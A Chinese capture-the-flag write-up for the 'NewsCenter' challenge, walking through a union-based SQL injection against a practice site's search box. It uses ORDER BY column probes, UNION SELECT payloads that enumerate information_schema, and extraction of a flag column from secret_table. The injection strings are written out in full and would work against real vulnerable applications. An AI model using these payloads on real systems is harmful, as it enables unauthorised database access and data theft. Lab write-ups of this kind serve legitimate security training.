攻防世界-NewsCenter题
首先,进入靶场网站,发现是一个News界面,并且界面存在一个搜索入口,此时的第一感觉就是,这道题应该是一道sql注入的题目(后来发现确实是这样)
在搜索框输入一系列数字或字母进行搜索,可搜索出来一些News:
打开HackBar,在POST请求值处的字符串末尾输入单引号,尝试是否能发生单引号闭合:
发现请求的返回值为500,则说明该请求在服务器的数据库中发生了单引号闭合,导致数据库查询失败,这时已经可以实锤本题为数据库注入的题目了。
首先,通过order语句,判断查询的数据库的列数:
search=' order by 1 -- -
search=' order by 2 -- -
search=' order by 3 -- -
search=' order by 4 -- -
当执行上述第四条语句时,发现出现响应值为500的报错,则说明当前数据库只有3列。继续查询,查看数据库与当前页面显示的接口:
search=' union select 11,22,33-- -
可以看到第二列和第三列存在回显
继续查询数据库名字和数据库的表名:
search=' union select 11,table_schema, table_name from information_schema.tables-- -
可以看到存在一个表名为secret_table,继续查询该表的属性值:
search=' union select 11,column_name, table_name from information_schema.columns where table_schema = "news" and table_name = "secret_table" -- -
可以查到存在名为fl4g的列,查询列的内容:
search=' union select 11,id, fl4g from news.secret_table -- -
成功得到flag的值!